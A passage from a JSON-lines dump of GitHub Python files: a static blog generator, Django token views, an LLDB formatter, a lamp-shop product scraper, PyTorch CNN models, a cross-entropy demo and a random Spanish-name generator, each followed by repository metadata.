self.render_template('entries.html.j2', outfile, values)\n values['entries'] = {} # reset the entries dict.\n\n\n def gen_archive(self, date_format='%c'):\n \"\"\"Generate complete archive.\n\n :param date_format: Date format for entry\n :type date_format: str\n \"\"\"\n archive = dict()\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n post = os.path.join(self.entries_dir, filename)\n meta = Meta(Mulang(post, self.encoding).metadata())\n\n private = meta.private()\n title = meta.title()\n #summary = meta.summary()\n date = meta.date(date_format)\n date_info = meta.date_info()\n date_idx = meta.date('%Y-%m-%d')\n comments = meta.comments()\n uri = link_to(slugify(strip_html_tags(title)),\n self.entry_link_prefix(filename),\n makedirs=False, justdir=True)\n\n # Generate archive\n if not private:\n val = { 'uri': uri, 'title': title, 'date': date,\n 'date_idx': date_idx,\n 'comments': comments }\n d = datetime.strptime(meta.date('%Y-%m-%d'), '%Y-%m-%d')\n idx_year = d.strftime('%Y')\n idx_month = d.strftime('<%m> %B')#%m is to sort chronologically\n if idx_year in archive:\n if idx_month in archive[idx_year]:\n archive[idx_year][idx_month].append(val)\n else:\n archive[idx_year][idx_month] = [val]\n #sort entries\n archive[idx_year][idx_month] = sorted(archive[idx_year][idx_month], key=lambda k: k['date_idx'])\n else:\n archive[idx_year] = dict()\n archive[idx_year][idx_month] = [val]\n\n values = self.template_values.copy()\n values['archive'] = archive\n outfile = link_to('archive.html', self.deploy_dir)\n return self.render_template('archive.html.j2', outfile, values)\n\n\n def gen_tags(self, 
date_format='%c'):\n \"\"\"Generate tags pages.\n\n :param date_format: Date format for entry\n :type date_format: str\n \"\"\"\n entries_by_tag = dict()\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n post = os.path.join(self.entries_dir, filename)\n meta = Meta(Mulang(post, self.encoding).metadata())\n\n private = meta.private()\n title = meta.title()\n summary = meta.summary()\n tag_list = meta.tag_list()\n date = meta.date(date_format)\n date_idx = meta.date('%Y-%m-%d')\n uri = link_to(slugify(strip_html_tags(title)),\n self.entry_link_prefix(filename),\n makedirs=False, justdir=True)\n\n # Generate archive\n if not private:\n val = { 'uri': uri, 'title': title, 'date': date,\n 'date_idx': date_idx }\n for tag in tag_list:\n if tag in entries_by_tag:\n entries_by_tag[tag].append(val)\n else:\n entries_by_tag[tag] = [val]\n\n # One page for each tag\n values = self.template_values.copy()\n for tag in entries_by_tag:\n values['tag_name'] = tag\n values['entries'] = entries_by_tag[tag]\n #sort entries\n values['entries'] = sorted(values['entries'], key=lambda k:\n k['date_idx'], reverse=True)\n outfile = link_to(tag, os.path.join(self.deploy_dir, self.tags_dir))\n self.render_template('tag.html.j2', outfile, values)\n\n\n def gen_tag_cloud(self):\n \"\"\"Generate tags cloud page.\"\"\"\n entries_by_tag = dict()\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n post = os.path.join(self.entries_dir, filename)\n meta = Meta(Mulang(post, self.encoding).metadata())\n private = meta.private()\n title = meta.title()\n tag_list = meta.tag_list()\n\n # Generate archive\n if not private:\n val = { 'title': title }\n for tag in tag_list:\n if tag in entries_by_tag:\n entries_by_tag[tag].append(val)\n else:\n entries_by_tag[tag] = [val]\n\n # multipliers seq. 
for tag size in function of times repeated\n        tagcloud_seq = [ 0, 14, 21, 27, 32, 38, 42, 45, 47, 48 ]\n\n        # One page for each tag\n        values = self.template_values.copy()\n        values['tags'] = []\n        for tag in entries_by_tag:\n            if tag:\n                tagname, tagfreq = tag, len(entries_by_tag[tag])\n                mult = 100 + int(tagcloud_seq[-1] \\\n                        if tagfreq > len(tagcloud_seq) \\\n                        else tagcloud_seq[tagfreq - 1])\n                values['tags'].append({ tagname: mult })\n\n        outfile = link_to('', os.path.join(self.deploy_dir, self.tags_dir))\n        self.render_template('tagcloud.html.j2', outfile, values)\n\n\n    def gen_page(self, infile):\n        \"\"\"Generate an HTML page from its Markdown counterpart.\n\n        :param infile: Markdown file to parse\n        :type infile: str\n        :return: Generated HTML\n        :rtype: str\n        \"\"\"\n        inpath = os.path.join(self.pages_dir, infile)\n        ml = Mulang(inpath, self.encoding)\n        meta = Meta(ml.metadata())\n        content_html = ml.html(verbose=self.verbose)\n        values = self.template_values.copy()\n        values['page'] = { #append\n                'title': meta.title(),\n                'raw_title': strip_html_tags(meta.title()),\n                'content': content_html }\n\n        outfile = link_to(infile, os.path.join(self.deploy_dir,\n            self.pages_dir))\n        return self.render_template('page.html.j2', outfile, values)\n\n\n    def gen_pages(self):\n        \"\"\"Generate all pages.\"\"\"\n        for filename in os.listdir(self.pages_dir):\n            if os.path.splitext(filename)[1] == self.infile_ext:\n                self.gen_page(filename)\n\n\n    def gen_feed(self, feed=\"atom\"):\n        if feed == \"rss\":\n            self.gen_feed_rss()\n        else:\n            self.gen_feed_atom()\n\n\n    def gen_feed_atom(self, outfile='atom.xml'):\n        \"\"\"Generate blog Atom feed.\n        \"\"\"\n        feed = AtomFeed(title=self.site_name if self.site_name \\\n                    else self.canonical_uri,\n                subtitle=self.site_description if self.site_description\n                    else 'Feed',\n                feed_url=os.path.join(self.canonical_uri, self.base_uri, outfile),\n                url=os.path.join(self.canonical_uri, self.base_uri),\n                author=self.site_author)\n\n        entries = list()\n        for filename in os.listdir(self.entries_dir):\n            if os.path.splitext(filename)[1] == self.infile_ext:\n                infile = os.path.join(self.entries_dir, filename)\n                ml = Mulang(infile, self.encoding)\n                meta = Meta(ml.metadata())\n                author = self.site_name if not meta.author() \\\n                    else meta.author()\n                content_html = ml.html(verbose=False)\n                private = meta.private()\n                title = meta.title()\n                date_idx = meta.date('%Y-%m-%d %H:%M:%S')\n                timezone = 'UTC' if not meta.date('%Z') else meta.date('%Z')\n                date_iso8601 = meta.date('%Y-%m-%dT%H:%M') + timezone\n                updated = datetime.strptime(date_iso8601, \\\n                        '%Y-%m-%dT%H:%M%Z')\n                uri = link_to(slugify(title),\n                        self.entry_link_prefix(filename),\n                        makedirs=False, justdir=True)\n                full_uri = os.path.join(self.canonical_uri,\n                        self.base_uri, uri)\n\n                if not private:\n                    val = { 'title': strip_html_tags(title),\n                            'content_html': content_html,\n                            'author': author,\n                            'full_uri': full_uri,\n                            'date_idx': date_idx,\n                            'updated': updated }\n                    entries.append(val)\n\n        # sort chronologically descending\n        entries = sorted(entries, key=lambda k: k['date_idx'],\n                reverse=True)\n        for entry in entries:\n            feed.add(title = entry['title'],\n                    content = entry['content_html'],\n                    author = entry['author'],\n                    url = entry['full_uri'],\n                    updated = entry['updated'])\n\n        output_file = codecs.open(os.path.join(self.deploy_dir, \\\n                outfile), mode='w', encoding=self.encoding)\n        output_file.write(feed.to_string())\n\n\n#    def gen_feed_rss(self, outfile='feed.xml'):\n#        \"\"\"Generate blog feed.\n#\n#        .. 
todo: Why I cannot do this without changing the locale?\n# \"\"\"\n# # This doesn't work in another locale, will be restored\n# locale.setlocale(locale.LC_ALL, \"en_US\")\n#\n# entries = list()\n# for filename in os.listdir(self.entries_dir):\n# if os.path.splitext(filename)[1] == self.infile_ext:\n# infile = os.path.join(self.entries_dir, filename)\n# ml = Mulang(infile, self.encoding)\n# meta = Meta(ml.metadata())\n# content_html = ml.html(verbose=False)\n# private = meta.private()\n# title = meta.title()\n# summary = meta.summary()\n# date_idx = meta.date('%Y-%m-%d %H:%M:%S')\n# # Date+time in RFC-822 format. fixing lack of timezone\n# # when there's none (UTC by default).\n# timezone = '+0000' if not meta.date('%z') \\\n# else meta.date('%z')\n# pub_date = meta.date('%a, %d %b %Y %H:%M:%S') + \\\n# \" \" + timezone\n# uri = link_to(slugify(title),\n# self.entry_link_prefix(filename),\n# makedirs=False, justdir=True)\n# full_uri = os.path.join(self.canonical_uri,\n# self.base_uri, uri)\n# if not private:\n# val = { 'title': strip_html_tags(title),\n# 'content_html': content_html,\n# #'summary': summary,\n# 'full_uri': full_uri,\n# 'date_idx': date_idx,\n# 'pub_date': pub_date }\n# entries.append(val)\n#\n# # sort chronologically descent\n# entries = sorted(entries, key=lambda k: k['date_idx'],\n# reverse=True)\n# for entry in entries:\n# entries.append(\n# RSS2.RSSItem(\n# title = entry['title'],\n# link = entry['full_uri'],\n# #description = entry['summary'],\n# description = entry['content_html'],\n# guid = RSS2.Guid(entry['full_uri']),\n# pubDate = entry['pub_date']))\n#\n# rss = RSS2.RSS2(\n# title = self.site_name if self.site_name \\\n# else self.canonical_uri,\n# description = \"RSS\",\n# link = self.canonical_uri,\n# lastBuildDate = datetime.now(),\n# items = entries\n# )\n#\n# rss.write_xml(open(os.path.join(self.deploy_dir, outfile), 'w'),\n# self.encoding)\n# # Restore locale\n# locale.setlocale(locale.LC_ALL, self.wlocale)\n\n\n def gen_static(self):\n \"\"\"Generates (copies) static directory.\"\"\"\n src = self.static_dir\n dst = os.path.join(self.deploy_dir, self.static_dir)\n if os.path.exists(src):\n shutil.rmtree(dst, ignore_errors=True)\n shutil.copytree(src, dst)\n\n\n def gen_media(self):\n \"\"\"Generates media directories if they exist.\"\"\"\n if self.extra_dirs:\n for extra_dir in self.extra_dirs:\n src = extra_dir\n dst = os.path.join(self.deploy_dir, extra_dir)\n if os.path.exists(src):\n shutil.rmtree(dst, ignore_errors=True)\n shutil.copytree(src, dst)\n if self.verbose:\n print('Copied directory', src)\n\n\n def gen_site(self):\n \"\"\"Generate all content!.\n \"\"\"\n self.gen_entries(self.date_format_entries)\n self.gen_pages()\n self.gen_archive(self.date_format_list)\n self.gen_tags(self.date_format_list)\n self.gen_tag_cloud()\n self.gen_home(self.max_entries, self.date_format_home)\n self.gen_feed(self.feed_format)\n self.gen_static()\n self.gen_media()\n\n","repo_name":"maRc2/pynfact","sub_path":"pynfact/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":23404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43959060300","text":"from django.shortcuts import render\nfrom .models import Token\nfrom django.http import Http404\nfrom django.contrib.auth.decorators import login_required\nfrom secrets import token_bytes\nimport json\n\n# Create your views here.\n@login_required\ndef index(request):\n \"\"\"\n View function for index page\n Get Tokens linked to user\n Count 
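The builder above leans on slugify and strip_html_tags from the struri module, which is not shown here; a minimal sketch of what such helpers typically do (the real implementations may differ):

import re
import unicodedata

def strip_html_tags(text):
    # Drop anything that looks like an HTML tag.
    return re.sub(r'<[^>]+>', '', text)

def slugify(text):
    # ASCII-fold, drop punctuation, and join words with hyphens.
    text = unicodedata.normalize('NFKD', text).encode('ascii', 'ignore').decode()
    text = re.sub(r'[^\w\s-]', '', text).strip().lower()
    return re.sub(r'[-\s]+', '-', text)

assert slugify(strip_html_tags('<em>Hello, World!</em>')) == 'hello-world'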
them\n Render template and pass context\n\n \"\"\"\n tokens = Token.objects.filter(accounts__id__contains=request.user.id)\n context = {\n \"num_tokens\": Token.objects.count(),\n \"tokens\": tokens\n }\n return render(request, 'index.html', context=context)\n\n\n@login_required\ndef show_token(request, pk):\n \"\"\"\n View function to get token key\n request: HTTP request\n token_id: int value taken from url -> token PK\n\n Try to get the token with id token_id\n Check if it is associated to the user's account\n Generate key if it isn't available\n Render details\n \"\"\"\n try:\n token = Token.objects.get(pk=pk)\n if token in Token.objects.filter(accounts__id__contains=request.user.id):\n if not token.key: # Generate token key if it doesnt exist\n token.key = token_bytes(16)\n token.save()\n\n #\n context = {\n \"key\": json.dumps(list(token.key))\n }\n\n return render(request, 'token.html', context=context)\n else:\n raise Http404('Token not found') # Probably should be a 403 but leaving it ambiguous..\n\n except Token.DoesNotExist:\n raise Http404('Token not found')\n","repo_name":"darylo99/6200FYP-DO","sub_path":"words/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5024923048","text":"import lldb\nimport objc_runtime\nimport summary_helpers\n\nstatistics = lldb.formatters.metrics.Metrics()\nstatistics.add_metric('invalid_isa')\nstatistics.add_metric('invalid_pointer')\nstatistics.add_metric('unknown_class')\nstatistics.add_metric('code_notrun')\n\n\nclass SKRequest_SynthProvider(object):\n # SKRequest:\n # Offset / size 32bit: 64bit:\n #\n # Class isa 0 = 0x00 / 4 0 = 0x00 / 8\n # SKRequestInternal *_requestInternal 4 = 0x04 / 4 8 = 0x08 / 8\n\n # SKRequestInternal:\n # Offset / size 32bit: 64bit:\n #\n # Class isa 0 = 0x00 / 4 0 = 0x00 / 8\n # int _backgroundTaskIdentifier 4 = 0x04 / 4 8 = 0x08 / 4 + 4\n # SKPaymentQueueClient *_client 8 = 0x08 / 4 16 = 0x10 / 8\n # SKXPCConnection *_connection 12 = 0x0c / 4 24 = 0x18 / 8\n # id _delegate 16 = 0x10 / 4 32 = 0x20 / 8\n # int _state 20 = 0x14 / 4 40 = 0x28 / 4\n\n def __init__(self, value_obj, sys_params, internal_dict):\n super(SKRequest_SynthProvider, self).__init__()\n self.value_obj = value_obj\n self.sys_params = sys_params\n self.internal_dict = internal_dict\n\n self.request_internal = None\n self.update()\n\n def update(self):\n self.adjust_for_architecture()\n # _requestInternal (self->_requestInternal)\n self.request_internal = self.value_obj.GetChildMemberWithName(\"_requestInternal\")\n\n def adjust_for_architecture(self):\n pass\n\n def summary(self):\n return \"\"\n\n\ndef SKRequest_SummaryProvider(value_obj, internal_dict):\n # Class data\n global statistics\n class_data, wrapper = objc_runtime.Utilities.prepare_class_detection(value_obj, statistics)\n summary_helpers.update_sys_params(value_obj, class_data.sys_params)\n if wrapper is not None:\n return wrapper.message()\n\n wrapper = SKRequest_SynthProvider(value_obj, class_data.sys_params, internal_dict)\n if wrapper is not None:\n return wrapper.summary()\n return \"Summary Unavailable\"\n\n\ndef __lldb_init_module(debugger, internal_dict):\n debugger.HandleCommand(\"type summary add -F SKRequest.SKRequest_SummaryProvider \\\n --category StoreKit \\\n SKRequest\")\n debugger.HandleCommand(\"type category enable 
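The Django token view above serializes the raw key as a JSON list of byte values; a hex string round-trips the same 16 bytes in a more compact form. Sketch:

from secrets import token_bytes

key = token_bytes(16)
wire = key.hex()                      # 32 hex characters on the wire
assert bytes.fromhex(wire) == key     # lossless round-trip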
StoreKit\")\n","repo_name":"fishman/dot_files","sub_path":"lldb/.lldb/Summaries/SKRequest.py","file_name":"SKRequest.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"19"} +{"seq_id":"32516238942","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\nimport glob\nimport urllib.request\nfrom PIL import Image\n\n\ndef download_and_convert_photos(images: list) -> list: \n \"\"\"Method used to download images from ist with links which are supposed to be webp images and\n convert them to jpg images\n\n Args:\n images (list): List with links to webp images\n\n Returns:\n list: List with paths to jpg images\n \"\"\"\n jpg_paths = []\n for image in images:\n # download and save image\n filename = image.split('/')[-1]\n path = f\"images/produkty_webp/{filename}\"\n urllib.request.urlretrieve(image, path)\n\n # convert .webp images to .jpg as prestashop 1.7 doesnt support webp \n im = Image.open(path).convert(\"RGB\")\n # remove extension and append .jpg\n filename = f\"{filename.rsplit('.', 1)[0]}.jpg\"\n path = f\"images/produkty_jpg/{filename}\"\n im.save(path,\"jpeg\")\n jpg_paths.append(path)\n return jpg_paths\n\n\ndef get_links(page_link: str) -> list:\n \"\"\"\n Method used to get links of product in store\n \n Args:\n page_link (str): Url of category\n \n Returns:\n product_links (list): Urls of every product in shop\n \"\"\"\n k = requests.get(page_link).text\n bs = BeautifulSoup(k, 'html.parser')\n num = bs.find(\"a\", {\"title\":\"ostatnia strona\"}).get(\"data-pagination\")\n \n product_links = [] \n for page in range(1, int(num) + 1): \n url = f'{page_link}/lp/{page}'\n k = requests.get(url).text\n\n bs = BeautifulSoup(k,'html.parser')\n productlist = bs.find_all(\"div\", {\"class\":\"product-list-item\"})\n \n for product in productlist:\n link = product.find(\"a\", {\"class\":\"product-content-container\"}).get(\"href\") \n product_links.append(link)\n \n return product_links\n\n\ndef get_data(products_links: list, headers: dict) -> list:\n \"\"\"\n Method used to get data of products in store\n\n Args:\n products_links (list): Urls of every product in shop\n headers (dict): user-agent data\n\n Returns:\n data (list): Data of store all products in dictionaries\n \n \"\"\"\n data=[]\n for category in products_links:\n print(category)\n for link in products_links[category]:\n f = requests.get(link,headers=headers).text\n bs = BeautifulSoup(f,'html.parser')\n \n try:\n name = bs.find(\"h1\", {\"class\":\"product-title\"}).text.replace('\\n',\"\")\n except:\n name = None\n\n\n try:\n price = bs.find(\"strong\", {\"class\":\"produkt-cena\"}).text.replace('\\n',\"\").strip().replace(\" \", \"\")\n # remove zl from price, replace , with .\n price = price[:-2].replace(',', '.')\n except:\n price = \"0.0\"\n \n \n try:\n short_about = bs.find(\"div\", {\"class\":\"product-short-description\"}).text.replace('\\n',\"\").strip()\n except:\n short_about=None\n \n \n try:\n selection = []\n selector_description = bs.find(\"label\", {\"class\":\"col-sm-4\"}).text.replace('\\n',\"\")\n \n selector = bs.find(\"select\", {\"class\":\"custom-select\"}).find_all('option')\n for sel in selector:\n selection.append(sel.text.strip())\n except:\n selector_description = None\n selection = None\n \n \n try:\n description = bs.find(\"div\", {\"class\":\"col-sm-9\"}).text\n except:\n description = None\n \n \n try: \n attributes_table = bs.find(\"table\", {\"class\":\"table\"})\n attributes = {}\n for row in 
attributes_table.findAll('tr'):\n                    key = row.find('th').text\n                    value = row.find('td').text\n                    attributes[key] = value \n            except:\n                attributes = None\n            \n            \n            try:\n                images = []\n                img_divs = bs.find_all(\"div\", {\"class\":\"image\"})\n                for image_link in img_divs:\n                    images.append(image_link.find(\"img\").get(\"src\"))\n                \n                images = download_and_convert_photos(images)\n\n            except:\n                images = [None]\n            \n            lamp = {\"category\": category,\n                \"name\": name,\n                \"price\": price,\n                \"short_about\": short_about,\n                \"selector_description\": selector_description,\n                \"selection\": selection,\n                \"description\": description,\n                \"attributes\": attributes,\n                \"images\": images\n                }\n            \n            data.append(lamp)\n    return data\n\ndef retrieve_links() -> dict:\n    \"\"\"Method used to retrieve links of products\n\n    Returns:\n        dict: Product links for each shop category, keyed by category name\n    \"\"\"\n    for file in glob.glob(\"./products_data/links.json\"):\n        print(file)\n        with open(file, 'r', encoding=\"UTF-8\") as infile:\n            data = json.load(infile)\n    return data\n    \ndef save_links():\n    \"\"\"\n    Method used to save links of all shop categories\n    Links are saved in JSON file with categories as keys\n    \"\"\"\n    categories = ['https://www.skleplampy.pl/kategoria/tasmy-led-291',\n                'https://www.skleplampy.pl/kategoria/lampy-wiszace-i-zyrandole-273',\n                'https://www.skleplampy.pl/kategoria/kinkiety-274',\n                'https://www.skleplampy.pl/kategoria/lampy-sufitowe-i-plafony-275',\n                'https://www.skleplampy.pl/kategoria/lampy-stojace-276',\n                'https://www.skleplampy.pl/kategoria/oprawy-wpuszczane-277',\n                'https://www.skleplampy.pl/kategoria/listwy-reflektory-spoty-278',\n                'https://www.skleplampy.pl/kategoria/lampy-zewnetrzne-wiszace-279',\n                'https://www.skleplampy.pl/kategoria/plafony-zewnetrzne-280',\n                'https://www.skleplampy.pl/kategoria/lampy-ogrodowe-stojace-281',\n                'https://www.skleplampy.pl/kategoria/oprawy-najazdowe-285',\n                'https://www.skleplampy.pl/kategoria/zarowki-286',\n                'https://www.skleplampy.pl/kategoria/wentylatory-287',\n                ]\n    links = {}\n    for link in categories:\n        category_name = ''.join([i for i in link.split('/')[-1] if not i.isdigit()])\n        links[category_name[:-1]] = get_links(page_link=link)\n        \n    with open(\"./products_data/links.json\", 'w', encoding=\"UTF-8\") as outfile:\n        json.dump(links, outfile, ensure_ascii=False, indent=4)\n    \nif __name__ == '__main__':\n    base_url = \"https://www.skleplampy.pl/\"\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'}\n    \n    # save_links()\n    products_links = retrieve_links()\n    \n    data = get_data(products_links=products_links, headers=headers)\n    with open('./products_data/products.json', 'w', encoding=\"UTF-8\") as outfile:\n        json.dump(data, outfile, ensure_ascii=False, indent=4)\n","repo_name":"gpawluki/sklep_lampiarski","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"22450664965","text":"import torch\r\nfrom torch import nn\r\nimport torchvision.models\r\n\r\nclass MiniXception(nn.Module):\r\n    def __init__(self, in_channels=3):\r\n        super(MiniXception, self).__init__()\r\n\r\n        self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=96, kernel_size=3, stride=2, padding=1, bias=False)\r\n        self.bn1 = nn.BatchNorm2d(96)\r\n        self.act1 = nn.ReLU()\r\n\r\n        self.conv2 = nn.Conv2d(in_channels=96, out_channels=128, kernel_size=3, stride=2, padding=1, bias=False)\r\n        self.bn2 = 
nn.BatchNorm2d(128)\r\n        self.act2 = nn.ReLU()\r\n\r\n        self.blocks = self._make_xception_blocks(in_channels=128, n=2)\r\n\r\n        self.sepconv = DepthwiseSeparableConv(in_channels=512, out_channels=256)\r\n        self.pool = nn.AdaptiveAvgPool2d((1, 1))\r\n        self.fc = nn.Linear(256, 256)\r\n\r\n    def forward(self, x):\r\n        x = self.act1(self.bn1(self.conv1(x)))\r\n        x = self.act2(self.bn2(self.conv2(x)))\r\n        x = self.blocks(x)\r\n        x = self.sepconv(x)\r\n        x = self.pool(x)\r\n        x = torch.flatten(x, 1)\r\n        x = self.fc(x)\r\n        return x\r\n\r\n    def _make_xception_blocks(self, in_channels, n):\r\n        cur_channels = in_channels\r\n        blocks = list()\r\n        for i in range(n):\r\n            blocks.append(MiniXceptionBlock(cur_channels))\r\n            cur_channels *= 2\r\n\r\n        return nn.Sequential(*blocks)\r\n\r\nclass MiniXceptionBlock(nn.Module):\r\n    def __init__(self, in_channels):\r\n        super(MiniXceptionBlock, self).__init__()\r\n        self.in_channels = in_channels\r\n        self.out_channels = 2 * self.in_channels\r\n\r\n        self.res_conv = nn.Sequential(\r\n            nn.Conv2d(self.in_channels, self.out_channels, kernel_size=1, stride=2, padding=0),\r\n            nn.BatchNorm2d(self.out_channels)\r\n        )\r\n        self.block = nn.Sequential(\r\n            DepthwiseSeparableConv(self.in_channels, self.out_channels),\r\n            nn.BatchNorm2d(self.out_channels),\r\n            nn.ReLU(),\r\n            DepthwiseSeparableConv(self.out_channels, self.out_channels),\r\n            nn.BatchNorm2d(self.out_channels),\r\n            nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\r\n        )\r\n\r\n    def forward(self, x):\r\n        return self.res_conv(x) + self.block(x)\r\n\r\n\r\nclass DepthwiseSeparableConv(nn.Module):\r\n    def __init__(self, in_channels, out_channels, kernel_size=3, padding=1):\r\n        super(DepthwiseSeparableConv, self).__init__()\r\n        self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, padding=padding, groups=in_channels, bias=False)\r\n        self.pointwise = nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False)\r\n\r\n    def forward(self, x):\r\n        x = self.depthwise(x)\r\n        x = self.pointwise(x)\r\n        return x\r\n\r\nclass ResNet18(nn.Module):\r\n    def __init__(self, emotion_map):\r\n        super(ResNet18, self).__init__()\r\n        self.net = torchvision.models.resnet18()\r\n        self.net.fc = nn.Linear(self.net.fc.in_features, 50)\r\n\r\n    def forward(self, x):\r\n        return self.net(x)\r\n\r\n\r\nclass ConvNet(nn.Module):\r\n    def __init__(self,):\r\n        super(ConvNet, self).__init__()\r\n\r\n        self.layer1 = self._make_conv_block(in_channels=3, out_channels=16)\r\n        self.layer2 = self._make_conv_block(in_channels=16)\r\n        self.layer3 = self._make_conv_block(in_channels=32)\r\n        self.layer4 = self._make_conv_block(in_channels=64)\r\n        self.layer5 = self._make_conv_block(in_channels=128)\r\n        self.layer6 = self._make_conv_block(in_channels=256)\r\n\r\n        self.avgpool = nn.AdaptiveAvgPool2d(output_size=(1, 1))\r\n        self.fc = nn.Linear(in_features=512, out_features=256)\r\n\r\n    @staticmethod\r\n    def _make_conv_block(in_channels, out_channels=None):\r\n\r\n        if out_channels is None:\r\n            out_channels = in_channels * 2\r\n\r\n        layers = list()\r\n        layers.append(nn.Conv2d(\r\n            in_channels=in_channels,\r\n            out_channels=out_channels,\r\n            kernel_size=3,\r\n            stride=1,\r\n            padding=1,\r\n            bias=False\r\n            )\r\n        )\r\n        layers.append(nn.BatchNorm2d(num_features=out_channels))\r\n        layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n        layers.append(nn.ReLU())\r\n\r\n        return nn.Sequential(*layers)\r\n\r\n    def forward(self, x):\r\n        x = self.layer1(x)\r\n        x = self.layer2(x)\r\n        x = self.layer3(x)\r\n        x = self.layer4(x)\r\n        x = self.layer5(x)\r\n        x = self.layer6(x)\r\n\r\n        x 
= self.avgpool(x)\r\n        x = torch.flatten(x, 1)\r\n        x = self.fc(x)\r\n        return x\r\n\r\nclass PretrConvNet(nn.Module):\r\n    def __init__(self, freeze=True):\r\n        import pretrainedmodels\r\n        super(PretrConvNet, self).__init__()\r\n\r\n        self.backbone = pretrainedmodels.resnet34(pretrained='imagenet')\r\n\r\n        if freeze:\r\n            for param in self.backbone.parameters():\r\n                param.requires_grad = False\r\n\r\n        self.backbone.last_linear = torch.nn.Linear(self.backbone.last_linear.in_features,256)\r\n\r\n    def forward(self, x):\r\n        return self.backbone(x)\r\n    \r\n#model = MiniXception()\r\n#model = ConvNet()\r\n#model = PretrConvNet()\r\n# img = torch.rand(10,3,224,224)\r\n# x = model(img)\r\n# print(x.size())","repo_name":"Qidian213/Emotion_challenge","sub_path":"emcnet.py","file_name":"emcnet.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"69918226284","text":"import torch\nfrom torch.nn import functional as F\n\n# entropy - measure of surprise\n# the higher the entropy, the smaller the surprise\n\n# KL divergence: the closer the two functions are, the closer the KLD is to 0\nx = torch.randn(1, 784)\nw = torch.randn(10, 784)\n\nlogits = x@w.t()\nprint(logits.shape)\n# cross_entropy applies softmax+log to the input by default; the second argument is the index of the target class\nloss = F.cross_entropy(logits, torch.tensor([4]))\nprint(loss)\n# to apply softmax yourself, use the code below\npred = F.softmax(logits, dim=1)\npred_log = torch.log(pred)\nprint(pred_log)\nloss2 = F.nll_loss(pred_log, torch.tensor([4]))\nprint(loss2)\n","repo_name":"sunstriderLHT/Pytorch-learning","sub_path":"Pytorch Lesson/Gradient/cross_entropy.py","file_name":"cross_entropy.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"8527542453","text":"#!/usr/bin/env python\n\nimport datetime\nfrom random import randint\nimport random\nfrom random import randrange\n\n\n# names\ndef Nombre():\n\n    VNom = [\n        \"Juan\",\n        \"Pedro\",\n        \"Maria\",\n        \"Rocio\",\n        \"Jose\",\n        \"Antonio\",\n        \"Agustin\",\n        \"Pablo\",\n        \"Alejandro\",\n        \"Jessica\",\n        \"Noemi\",\n        \"Paula\",\n        \"Fatima\",\n        \"Antonia\",\n        \"Ricardo\",\n        \"Javier\",\n        \"Manuel\",\n        \"Luis\",\n        \"Laura\",\n        \"Sonia\",\n        \"Paco\",\n        \"Lucia\",\n        \"Jaime\",\n        \"Rafael\",\n    ]\n\n    return VNom[randrange(0, len(VNom))]\n\n\ndef Apellidos():\n\n    VApell = [\n        \"Gomez\",\n        \"Troncoso\",\n        \"Fernandez\",\n        \"Castaño\",\n        \"Morales\",\n        \"Alcedo\",\n        \"Parodi\",\n        \"Torres\",\n        \"Aguilar\",\n        \"Sauco\",\n        \"Mangano\",\n        \"Ruiz\",\n        \"Aragon\",\n        \"Candon\",\n        \"Acosta\",\n        \"Cabeza\",\n        \"Soto\",\n        \"Ezequiel\",\n        \"Pericacho\",\n        \"Rodriguez\",\n    ]\n\n    return VApell[randrange(0, len(VApell))]\n\n\ndef Ciudad():\n\n    VCiudad = [\n        \"Lavalle\",\n        \"San Luis\",\n        \"Santa Fe\",\n        \"Lujan\",\n        \"Formosa\",\n        \"Bariloche\",\n        \"Santa Cruz\",\n        \"Salta\",\n        \"Resistencia\",\n        \"Buenos Aires\",\n        \"Santiago del Estero\",\n    ]\n    return VCiudad[randrange(0, len(VCiudad))]\n\n\ndef Localidad():\n\n    VLocalidad = [\n        \"Flores\",\n        \"Gernica\",\n        \"Mataderos\",\n        \"Capital Federal\",\n        \"Formosa\",\n        \"Resistencia\",\n        \"Jujuy\",\n        \"Gualeguaychu\",\n        \"La pampa\",\n        \"La banda\",\n    ]\n\n    return VLocalidad[randrange(0, len(VLocalidad))]\n\n\ndef Provincia():\n\n    VProvincia = [\n        \"Buenos Aires\",\n        \"Capital Federal\",\n        \"Catamarca\",\n        \"Chaco\",\n        \"Chubut\",\n        \"Córdoba\",\n        \"Corrientes\",\n        \"Entre Ríos\",\n        \"Formosa\",\n        \"Jujuy\",\n        \"La Pampa\",\n        \"La Rioja\",\n        \"Mendoza\",\n        \"Misiones\",\n        \"Neuquén\",\n        \"Río Negro\",\n        \"Salta\",\n        \"San 
